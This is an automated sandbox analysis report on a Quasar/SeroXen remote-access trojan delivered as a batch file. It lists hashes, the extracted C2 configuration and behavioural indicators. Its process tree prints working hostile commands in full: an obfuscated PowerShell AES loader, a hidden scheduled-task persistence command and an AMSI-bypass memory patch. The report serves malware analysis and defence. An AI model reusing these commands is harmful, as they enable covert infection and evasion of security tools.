quasar | 070f7c800e8278b2cad111635cec3c501ff0aa9aa93fdd9529fcb8736a06d56d

Analysis

max time kernel
193s
max time network
255s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
29-05-2024 14:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Uni.bat
Size

1003KB
MD5

d6d62f532591a7d034abac21eff0b57b
SHA1

94c28efce74a67eb18d28bd51f65d285c8d1caef
SHA256

070f7c800e8278b2cad111635cec3c501ff0aa9aa93fdd9529fcb8736a06d56d
SHA512

26f94770e0d250aa6e063af8d5422848a72753a72b20e62b33a76fef5453cdd9e1f70466a935ef0dec145af9b293e12a6ec0e9101f0bd8e80edd3f4be706294a
SSDEEP

24576:iGtp7xs0OFrW/eIeexsYboNCkhhdmjynCf7O:jXO5WnsYcTdPnwO

Score

10^/10

quasar seroxen | v3.1.5 |execution spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
3000

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen | v3.1.5 |

runderscore00-25501.portmap.host:25501

Mutex

$Sxr-jy6vh8CtEJL5ceZuIb

Attributes

encryption_key
JCa22tR8WnO00adn2TuE
install_name
$sxr-powershell.exe
log_directory
$sxr-Logs
reconnect_delay
3000
startup_key
Powershell
subdirectory
$sxr-seroxen2

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1212-33-0x0000000009A80000-0x0000000009B72000-memory.dmp	family_quasar
behavioral1/memory/4568-204-0x000000000A390000-0x000000000A3FC000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 1976 created 556 1976 powershell.EXE winlogon.exe

description	pid	process	target process
PID 1976 created 556	1976	powershell.EXE	winlogon.exe

Blocklisted process makes network request 8 IoCs

Processes:

powershell.exe

flow	pid	process
3	4568	powershell.exe
6	4568	powershell.exe
8	4568	powershell.exe
12	4568	powershell.exe
13	4568	powershell.exe
17	4568	powershell.exe
18	4568	powershell.exe
30	4568	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1212 powershell.exe
2016 powershell.exe
4568 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

Install.exe

pid process

4716 Install.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com

pid	process
4716	Install.exe

flow	ioc
1	ip-api.com

Drops file in System32 directory 2 IoCs

Processes:

powershell.EXE

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 1976 set thread context of 4760 1976 powershell.EXE dllhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 1976 set thread context of 4760	1976	powershell.EXE	dllhost.exe

Modifies data under HKEY_USERS 42 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings powershell.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3860 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings	powershell.exe

pid	process
3860	PING.EXE

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.EXE

pid	process
1212	powershell.exe
1212	powershell.exe
1212	powershell.exe
2016	powershell.exe
2016	powershell.exe
2016	powershell.exe
4568	powershell.exe
4568	powershell.exe
4568	powershell.exe
4988	powershell.exe
4988	powershell.exe
1976	powershell.EXE
1976	powershell.EXE
4988	powershell.exe
1976	powershell.EXE
1976	powershell.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeIncreaseQuotaPrivilege	2016	powershell.exe
Token: SeSecurityPrivilege	2016	powershell.exe
Token: SeTakeOwnershipPrivilege	2016	powershell.exe
Token: SeLoadDriverPrivilege	2016	powershell.exe
Token: SeSystemProfilePrivilege	2016	powershell.exe
Token: SeSystemtimePrivilege	2016	powershell.exe
Token: SeProfSingleProcessPrivilege	2016	powershell.exe
Token: SeIncBasePriorityPrivilege	2016	powershell.exe
Token: SeCreatePagefilePrivilege	2016	powershell.exe
Token: SeBackupPrivilege	2016	powershell.exe
Token: SeRestorePrivilege	2016	powershell.exe
Token: SeShutdownPrivilege	2016	powershell.exe
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeSystemEnvironmentPrivilege	2016	powershell.exe
Token: SeRemoteShutdownPrivilege	2016	powershell.exe
Token: SeUndockPrivilege	2016	powershell.exe
Token: SeManageVolumePrivilege	2016	powershell.exe
Token: 33	2016	powershell.exe
Token: 34	2016	powershell.exe
Token: 35	2016	powershell.exe
Token: 36	2016	powershell.exe
Token: SeIncreaseQuotaPrivilege	2016	powershell.exe
Token: SeSecurityPrivilege	2016	powershell.exe
Token: SeTakeOwnershipPrivilege	2016	powershell.exe
Token: SeLoadDriverPrivilege	2016	powershell.exe
Token: SeSystemProfilePrivilege	2016	powershell.exe
Token: SeSystemtimePrivilege	2016	powershell.exe
Token: SeProfSingleProcessPrivilege	2016	powershell.exe
Token: SeIncBasePriorityPrivilege	2016	powershell.exe
Token: SeCreatePagefilePrivilege	2016	powershell.exe
Token: SeBackupPrivilege	2016	powershell.exe
Token: SeRestorePrivilege	2016	powershell.exe
Token: SeShutdownPrivilege	2016	powershell.exe
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeSystemEnvironmentPrivilege	2016	powershell.exe
Token: SeRemoteShutdownPrivilege	2016	powershell.exe
Token: SeUndockPrivilege	2016	powershell.exe
Token: SeManageVolumePrivilege	2016	powershell.exe
Token: 33	2016	powershell.exe
Token: 34	2016	powershell.exe
Token: 35	2016	powershell.exe
Token: 36	2016	powershell.exe
Token: SeIncreaseQuotaPrivilege	2016	powershell.exe
Token: SeSecurityPrivilege	2016	powershell.exe
Token: SeTakeOwnershipPrivilege	2016	powershell.exe
Token: SeLoadDriverPrivilege	2016	powershell.exe
Token: SeSystemProfilePrivilege	2016	powershell.exe
Token: SeSystemtimePrivilege	2016	powershell.exe
Token: SeProfSingleProcessPrivilege	2016	powershell.exe
Token: SeIncBasePriorityPrivilege	2016	powershell.exe
Token: SeCreatePagefilePrivilege	2016	powershell.exe
Token: SeBackupPrivilege	2016	powershell.exe
Token: SeRestorePrivilege	2016	powershell.exe
Token: SeShutdownPrivilege	2016	powershell.exe
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeSystemEnvironmentPrivilege	2016	powershell.exe
Token: SeRemoteShutdownPrivilege	2016	powershell.exe
Token: SeUndockPrivilege	2016	powershell.exe
Token: SeManageVolumePrivilege	2016	powershell.exe
Token: 33	2016	powershell.exe
Token: 34	2016	powershell.exe
Token: 35	2016	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

4568 powershell.exe

pid	process
4568	powershell.exe

Suspicious use of WriteProcessMemory 38 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exepowershell.EXEcmd.exe

description	pid	process	target process
PID 508 wrote to memory of 1212	508	cmd.exe	powershell.exe
PID 508 wrote to memory of 1212	508	cmd.exe	powershell.exe
PID 508 wrote to memory of 1212	508	cmd.exe	powershell.exe
PID 1212 wrote to memory of 2016	1212	powershell.exe	powershell.exe
PID 1212 wrote to memory of 2016	1212	powershell.exe	powershell.exe
PID 1212 wrote to memory of 2016	1212	powershell.exe	powershell.exe
PID 1212 wrote to memory of 932	1212	powershell.exe	WScript.exe
PID 1212 wrote to memory of 932	1212	powershell.exe	WScript.exe
PID 1212 wrote to memory of 932	1212	powershell.exe	WScript.exe
PID 932 wrote to memory of 2452	932	WScript.exe	cmd.exe
PID 932 wrote to memory of 2452	932	WScript.exe	cmd.exe
PID 932 wrote to memory of 2452	932	WScript.exe	cmd.exe
PID 2452 wrote to memory of 4568	2452	cmd.exe	powershell.exe
PID 2452 wrote to memory of 4568	2452	cmd.exe	powershell.exe
PID 2452 wrote to memory of 4568	2452	cmd.exe	powershell.exe
PID 4568 wrote to memory of 4988	4568	powershell.exe	powershell.exe
PID 4568 wrote to memory of 4988	4568	powershell.exe	powershell.exe
PID 4568 wrote to memory of 4988	4568	powershell.exe	powershell.exe
PID 4568 wrote to memory of 4716	4568	powershell.exe	Install.exe
PID 4568 wrote to memory of 4716	4568	powershell.exe	Install.exe
PID 4568 wrote to memory of 4716	4568	powershell.exe	Install.exe
PID 1976 wrote to memory of 4760	1976	powershell.EXE	dllhost.exe
PID 1976 wrote to memory of 4760	1976	powershell.EXE	dllhost.exe
PID 1976 wrote to memory of 4760	1976	powershell.EXE	dllhost.exe
PID 1976 wrote to memory of 4760	1976	powershell.EXE	dllhost.exe
PID 1976 wrote to memory of 4760	1976	powershell.EXE	dllhost.exe
PID 1976 wrote to memory of 4760	1976	powershell.EXE	dllhost.exe
PID 1976 wrote to memory of 4760	1976	powershell.EXE	dllhost.exe
PID 1976 wrote to memory of 4760	1976	powershell.EXE	dllhost.exe
PID 4568 wrote to memory of 3760	4568	powershell.exe	cmd.exe
PID 4568 wrote to memory of 3760	4568	powershell.exe	cmd.exe
PID 4568 wrote to memory of 3760	4568	powershell.exe	cmd.exe
PID 3760 wrote to memory of 2140	3760	cmd.exe	chcp.com
PID 3760 wrote to memory of 2140	3760	cmd.exe	chcp.com
PID 3760 wrote to memory of 2140	3760	cmd.exe	chcp.com
PID 3760 wrote to memory of 3860	3760	cmd.exe	PING.EXE
PID 3760 wrote to memory of 3860	3760	cmd.exe	PING.EXE
PID 3760 wrote to memory of 3860	3760	cmd.exe	PING.EXE

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:556

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f3425571-edb9-451a-90b7-6be0acc82d9f}
2⤵
PID:4760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:508

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j42DKp8x0h4213c6GrktRdOMxpGkpJXPO6k3HjxwrZM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7/5Nvry12FqfboNbAUGrww=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZIqOg=New-Object System.IO.MemoryStream(,$param_var); $mvnnt=New-Object System.IO.MemoryStream; $LUPro=New-Object System.IO.Compression.GZipStream($ZIqOg, [IO.Compression.CompressionMode]::Decompress); $LUPro.CopyTo($mvnnt); $LUPro.Dispose(); $ZIqOg.Dispose(); $mvnnt.Dispose(); $mvnnt.ToArray();}function execute_function($param_var,$param2_var){ $XYSou=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $haZBF=$XYSou.EntryPoint; $haZBF.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$XBrYH=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($TMJVW in $XBrYH) { if ($TMJVW.StartsWith(':: ')) { $RNBnP=$TMJVW.Substring(3); break; }}$payloads_var=[string[]]$RNBnP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1212

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_987_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_987.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_987.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_987.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:2452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j42DKp8x0h4213c6GrktRdOMxpGkpJXPO6k3HjxwrZM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7/5Nvry12FqfboNbAUGrww=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZIqOg=New-Object System.IO.MemoryStream(,$param_var); $mvnnt=New-Object System.IO.MemoryStream; $LUPro=New-Object System.IO.Compression.GZipStream($ZIqOg, [IO.Compression.CompressionMode]::Decompress); $LUPro.CopyTo($mvnnt); $LUPro.Dispose(); $ZIqOg.Dispose(); $mvnnt.Dispose(); $mvnnt.ToArray();}function execute_function($param_var,$param2_var){ $XYSou=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $haZBF=$XYSou.EntryPoint; $haZBF.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_987.bat';$XBrYH=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_987.bat').Split([Environment]::NewLine);foreach ($TMJVW in $XBrYH) { if ($TMJVW.StartsWith(':: ')) { $RNBnP=$TMJVW.Substring(3); break; }}$payloads_var=[string[]]$RNBnP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4568

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4988

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
6⤵
- Executes dropped EXE
PID:4716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BU6OljZoUHIB.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:3760

C:\Windows\SysWOW64\chcp.com
chcp 65001
7⤵
PID:2140

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
7⤵
- Runs ping.exe
PID:3860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PHzYfigChTpn{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MGRtFjLWiMlxhg,[Parameter(Position=1)][Type]$qFUlxBJZHE)$SPKoukWupHF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+'el'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+'y'+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+'a'+[Char](116)+'e'+'T'+'y'+'p'+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'Se'+'a'+'l'+'e'+''+'d'+','+[Char](65)+'n'+'s'+''+[Char](105)+''+'C'+'l'+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$SPKoukWupHF.DefineConstructor('RT'+[Char](83)+''+'p'+''+'e'+'ci'+[Char](97)+''+[Char](108)+''+'N'+''+'a'+'m'+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$MGRtFjLWiMlxhg).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+'ge'+[Char](100)+'');$SPKoukWupHF.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+'id'+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'ot'+[Char](44)+''+[Char](86)+''+[Char](105)+'rt'+[Char](117)+''+'a'+''+'l'+'',$qFUlxBJZHE,$MGRtFjLWiMlxhg).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+'im'+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $SPKoukWupHF.CreateType();}$aNAhsjedUMnPX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+'cr'+[Char](111)+'so'+[Char](102)+''+'t'+''+'.'+''+'W'+''+[Char](105)+'n3'+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+'Na'+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+'M'+''+'e'+''+[Char](116)+'ho'+'d'+''+[Char](115)+'');$JfasgYZkSaXymH=$aNAhsjedUMnPX.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'P'+''+[Char](114)+'oc'+'A'+''+[Char](100)+'dr'+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+'b'+''+'l'+''+'i'+'c'+[Char](44)+'St'+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$fOFBMSkWLRCeHDULeJA=PHzYfigChTpn @([String])([IntPtr]);$DQdtTRZyQsGVIOXyBHuyIU=PHzYfigChTpn @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kZaDvgzAjPZ=$aNAhsjedUMnPX.GetMethod('G'+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+'e').Invoke($Null,@([Object]('k'+'e'+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$DzszltrcSBRzjH=$JfasgYZkSaXymH.Invoke($Null,@([Object]$kZaDvgzAjPZ,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+'Li'+[Char](98)+''+[Char](114)+'ar'+[Char](121)+''+'A'+'')));$ucSXqzRjmJsnqfgCy=$JfasgYZkSaXymH.Invoke($Null,@([Object]$kZaDvgzAjPZ,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+''+'l'+''+'P'+'ro'+'t'+'e'+'c'+'t')));$ohjsvmi=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DzszltrcSBRzjH,$fOFBMSkWLRCeHDULeJA).Invoke('a'+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$GoSdIPrQMHsnyIzfu=$JfasgYZkSaXymH.Invoke($Null,@([Object]$ohjsvmi,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'iS'+[Char](99)+''+'a'+'nB'+[Char](117)+''+[Char](102)+''+'f'+''+'e'+'r')));$pKwYnIxlJT=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ucSXqzRjmJsnqfgCy,$DQdtTRZyQsGVIOXyBHuyIU).Invoke($GoSdIPrQMHsnyIzfu,[uint32]8,4,[ref]$pKwYnIxlJT);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GoSdIPrQMHsnyIzfu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ucSXqzRjmJsnqfgCy,$DQdtTRZyQsGVIOXyBHuyIU).Invoke($GoSdIPrQMHsnyIzfu,[uint32]8,0x20,[ref]$pKwYnIxlJT);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue('$'+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
1⤵
